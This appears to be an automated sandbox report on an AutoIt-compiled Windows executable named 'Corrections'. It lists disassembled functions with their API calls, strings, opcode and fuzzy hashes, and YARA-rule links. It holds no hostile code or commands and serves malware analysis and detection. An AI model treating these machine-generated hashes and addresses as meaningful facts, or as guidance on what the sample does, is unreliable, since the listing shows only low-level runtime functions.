Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 858238306049b6cbb2304f846b78f360b9ca827401d38b5efe649831447a2775
Instruction ID: 0c6b3e937cb25ae7693ca49fa6594175140f6dd726c86d64234021373c21a452
Opcode Fuzzy Hash: 858238306049b6cbb2304f846b78f360b9ca827401d38b5efe649831447a2775
Instruction Fuzzy Hash: 1591AF716082419FD720DF19C888F16BBE4EF89318F1489A9F5698B7A2C735ED85CBC1

Function 0092370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00923709,?,?), ref: 00923777
KillTimer.USER32(?,00000001,?,?,?,?,?,00923709,?,?), ref: 009237A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009237C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00923709,?,?), ref: 009237D1
CreatePopupMenu.USER32 ref: 009237E5
PostQuitMessage.USER32(00000000), ref: 00923806

Strings

TaskbarCreated, xrefs: 009237CC

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: faf74b3529b01a2c22f838a1e580072fcaa43d0275b9b0e93366916807ef053d
Instruction ID: 2373913342115abcc2e2697aa8297417deec4f70a008be67e025f25cda97327c
Opcode Fuzzy Hash: faf74b3529b01a2c22f838a1e580072fcaa43d0275b9b0e93366916807ef053d
Instruction Fuzzy Hash: 734128F1258265BBDF142B38AD99BB93BADE740710F00C225F501CA1A8DABD9F44E761

Function 009590C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526f8002751e9380f0ab5990e72192b8b1b725f77964e4eb187199c3bfde7ce1
Instruction ID: 5f50e3320fdfa0c4271e499115cf14eccebb367b78329966f37ae2c0badd14f2
Opcode Fuzzy Hash: 526f8002751e9380f0ab5990e72192b8b1b725f77964e4eb187199c3bfde7ce1
Instruction Fuzzy Hash: FDC10570908249EFEF11DFAAD841BADBBB4AF49311F144159EC14AB3E2C7349D4ACB60

Function 0093AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1b, xrefs: 0093AD55, 0093AE8E
i, xrefs: 0093B0A3
d10m0, xrefs: 0093ACF0
d0b, xrefs: 0093AC96, 0093AD10, 0093AEA7
d1r0,2, xrefs: 0093ACA9
d5m0, xrefs: 0093AE75

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: d05f2cc9e1549fb9fa8d2cd421e401bfce92dc82c7bf48f61c15680a84bd7d2e
Instruction ID: b3c04439e7b51692761f9ae5ec448ba5073dee0dc7db7ad3b8f40b336042aadb
Opcode Fuzzy Hash: d05f2cc9e1549fb9fa8d2cd421e401bfce92dc82c7bf48f61c15680a84bd7d2e
Instruction Fuzzy Hash: 4B6246756093418FC728DF24C198AAABBE4FFC8314F10896EE5998B351DB70E945CF82

Function 009235B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009235E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 00923616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00923368,?), ref: 0092361F

Strings

AutoIt v3, xrefs: 009235D9, 009235DE, 009235DF
edit, xrefs: 009235FC

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 802768024baf9f3fb801834d29d39fe78ef2061892f4145aaa23c65ea06f9ed0
Instruction ID: 7ab05b6e9bd87c14a66e436813611f9821aca8480e1b6487a26080b41e33dea4
Opcode Fuzzy Hash: 802768024baf9f3fb801834d29d39fe78ef2061892f4145aaa23c65ea06f9ed0
Instruction Fuzzy Hash: CEF05EB16292957AE7310B136C49FB73EBDD7C7F20F00002EB904A7160D6A90851FAB0

Function 009261A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00965287

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00926299

Strings

AutoIt - , xrefs: 0092620D
Line %d: , xrefs: 00965305

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 5e4b2511c6f53b8105edce82847658c41b0f0a8f1638f1764357f0a0bc612a9c
Instruction ID: 9ca024cd57e4eeef23c50d25ae87f37d9bb2fc4fc0eb5cdc6f42d480465580aa
Opcode Fuzzy Hash: 5e4b2511c6f53b8105edce82847658c41b0f0a8f1638f1764357f0a0bc612a9c
Instruction Fuzzy Hash: AB41B371408324AAC311EB60EC45FEF7BDCAF84720F004A2EF599921A5EF749A49C792

Function 009258CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009258BE,SwapMouseButtons,00000004,?), ref: 009258EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009258BE,SwapMouseButtons,00000004,?), ref: 00925910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009258BE,SwapMouseButtons,00000004,?), ref: 00925932

Strings

Control Panel\Mouse, xrefs: 009258ED

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: baabe38ecc72645fbf3bd73c71d8813f96752e4e68443eb94e3840a244c48e0e
Instruction ID: 487011b2eb3fbdcd5c993e9eac4146122882cff3801ce4615796d36961115997
Opcode Fuzzy Hash: baabe38ecc72645fbf3bd73c71d8813f96752e4e68443eb94e3840a244c48e0e
Instruction Fuzzy Hash: 04117C79511628FFDB219F64EC80EAE77BCEF01760F514529F801E7214E2319E85EB60

Function 0092F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009748C6

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 46a54cc848c371094a178e64d60bd7e606c9d89ee461c694a0a762c6d010d865
Instruction ID: 7465862464ca7755740920f976c91a9328df328c836d5840ced5ca0c2ab096cc
Opcode Fuzzy Hash: 46a54cc848c371094a178e64d60bd7e606c9d89ee461c694a0a762c6d010d865
Instruction Fuzzy Hash: 0EC29C71A00225CFCB24CF58D8A0BADB7B5BF88310F248579E94AAB395D375AD41CB90

Function 00930340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009315F2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 8dfd1e46d5c3926b2eb3ad3de534c62f71aa353f570e0689e3a06ed33d9223a5
Instruction ID: 095b4902ebce199ab0099f48a73e3cc81a18e08d7b121d415d32895034f25396
Opcode Fuzzy Hash: 8dfd1e46d5c3926b2eb3ad3de534c62f71aa353f570e0689e3a06ed33d9223a5
Instruction Fuzzy Hash: ACB27675A08301CFCB24CF18C490A2AB7E5BBD9304F24895DE99A8B3A1D775ED45CF92

Function 0094014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 009409D8

Part of subcall function 00943614: RaiseException.KERNEL32(?,?,?,009409FA,?,00000000,?,?,?,?,?,?,009409FA,00000000,009E9758,00000000), ref: 00943674

__CxxThrowException@8.LIBVCRUNTIME ref: 009409F5

Strings

Unknown exception, xrefs: 00940A02

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: ba87b9533f33c34f017aab4efa5fa80cd89850cc40d9b5e44be064a04e06d0e5
Instruction ID: cbaac301345261f8b906f294e0cd73bbd23e17f55613c4f695b0433c15886ff5
Opcode Fuzzy Hash: ba87b9533f33c34f017aab4efa5fa80cd89850cc40d9b5e44be064a04e06d0e5
Instruction Fuzzy Hash: 88F0C234D0420DB7CF04BEA4EC46E9E776C5EC4354B604521BB24965D2FB71EA5AC6D0

Function 009A89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009A8D52
TerminateProcess.KERNEL32(00000000), ref: 009A8D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 009A8F3A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: fb07fd3a7e70ad9f7a40335e07949b6945d510b05db9548e71303daca6ce03b7
Instruction ID: 9e831b2f9f913252936d05e4daab4999faca5ab55aebf86722af0be716c38ec7
Opcode Fuzzy Hash: fb07fd3a7e70ad9f7a40335e07949b6945d510b05db9548e71303daca6ce03b7
Instruction Fuzzy Hash: E2126A71A083419FC714DF28C484B6ABBE5FF89314F14895DE8898B392DB31E945CF92

Function 00922793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 0092327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009232AF
Part of subcall function 0092327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 009232B7
Part of subcall function 0092327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009232C2
Part of subcall function 0092327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009232CD
Part of subcall function 0092327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 009232D5
Part of subcall function 0092327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 009232DD

Part of subcall function 00923205: RegisterWindowMessageW.USER32(00000004,?,00922964), ref: 0092325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00922A0A
OleInitialize.OLE32 ref: 00922A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00963A0D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: bcda419ce54bcec0635ae217e495ea2e884620e4869de6a923a048bcb7c6ca0c
Instruction ID: 2fb41716795a3e78a7ea84db47e2554ed33c2b5085f6531077ca2f74c29ea56c
Opcode Fuzzy Hash: bcda419ce54bcec0635ae217e495ea2e884620e4869de6a923a048bcb7c6ca0c
Instruction Fuzzy Hash: A27199B092A3058F8798EF79AD697753BE0BB88354750822AE118CB2B6EB704445FF54

Function 0093FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00926299

KillTimer.USER32(?,00000001,?,?), ref: 0093FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0093FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0097FE33

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: f73c438c665ea2f7fec544c66047177405cadd20418ddd2d7042823fa295eab4
Instruction ID: cfc4b51caff513367dacaf20a04e88d43ad0b4a30a6c34926b644e5a2e51ff77
Opcode Fuzzy Hash: f73c438c665ea2f7fec544c66047177405cadd20418ddd2d7042823fa295eab4
Instruction Fuzzy Hash: 9731C871904744AFDB32CF248865BE7BBECAF02708F0044AED5DD67282D7745A85CB51

Function 00958A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,0095894C,?,009E9CE8,0000000C), ref: 00958A84
GetLastError.KERNEL32(?,0095894C,?,009E9CE8,0000000C), ref: 00958A8E
__dosmaperr.LIBCMT ref: 00958AB9

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: d4976dd2d170aa593a31c8221e92c1c89eeb2bb66235cb843b4bb97ef20af64a
Instruction ID: b42ef5287e60c0f7633314ffac1ac97f1d01f770fc383b7b06335076b045300e
Opcode Fuzzy Hash: d4976dd2d170aa593a31c8221e92c1c89eeb2bb66235cb843b4bb97ef20af64a
Instruction Fuzzy Hash: 78014E326191605AD624E237AC46B7F674D4BC5736F27065AFC14EB1D3DF308D885390

Function 0095970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,009597BA,FF8BC369,00000000,00000002,00000000), ref: 00959744
GetLastError.KERNEL32(?,009597BA,FF8BC369,00000000,00000002,00000000,?,00955ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00946F41), ref: 0095974E
__dosmaperr.LIBCMT ref: 00959755

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 3bb8a227358770ef85f2d18514f6b0cbf92c1c5a84ecb2706e3812cc5c402de5
Instruction ID: c9d0ffd5094865d68d0d496637cbcd9b747007bd0b19b51e344730897a714de4
Opcode Fuzzy Hash: 3bb8a227358770ef85f2d18514f6b0cbf92c1c5a84ecb2706e3812cc5c402de5
Instruction Fuzzy Hash: 19012832634119EBDB15DF9ADC05D6E3B29DB89331B25025AFC118B190EB309E419B90

Function 0092F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0092F27B
DispatchMessageW.USER32(?), ref: 0092F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092F29F
Sleep.KERNEL32(0000000A), ref: 0092F2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 009732D8

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 814d345cc9e3eaf8066e8c63559f7525d2a97ca2d77ff7b3931b86e3d3b91056
Instruction ID: f41300adc98a60c483ebc8fe90d7cf796e71da9330a58ca51895a16ca5d8be94
Opcode Fuzzy Hash: 814d345cc9e3eaf8066e8c63559f7525d2a97ca2d77ff7b3931b86e3d3b91056
Instruction Fuzzy Hash: E5F0893111934597E770C7A0DD89FEA33ACEF45310F108A28F219C70C4EB709588DB25

Function 00932B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00933006

Strings

CALL, xrefs: 00932FD6

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 026e127777796b231569f9bc626ba6faa8045741553d0b529b7ce064cda09913
Instruction ID: fdcf6c56dd6d5f01a8992f61fbea6c5ec66158a3dda2ef36488ec9ee2b23954c
Opcode Fuzzy Hash: 026e127777796b231569f9bc626ba6faa8045741553d0b529b7ce064cda09913
Instruction Fuzzy Hash: 4F2277716082019FC724DF24C881B2ABBE5BF98314F24895DF59A8B3A1D775E941CF82

Function 00931990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01234f891e3f08cb76143aa5960b8bb92f9d1bbd3fbd9a05f95c4c7ef6c5f0a8
Instruction ID: f28affed253815a1fef947ebe54b852f6b1672ea51feea92c59818ceae4e04aa
Opcode Fuzzy Hash: 01234f891e3f08cb76143aa5960b8bb92f9d1bbd3fbd9a05f95c4c7ef6c5f0a8
Instruction Fuzzy Hash: 7F32ED32A04615DFDB20DF54D881BAEB7B8FF85310F148958E959AB2A1E731ED40CF91

Function 00923A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

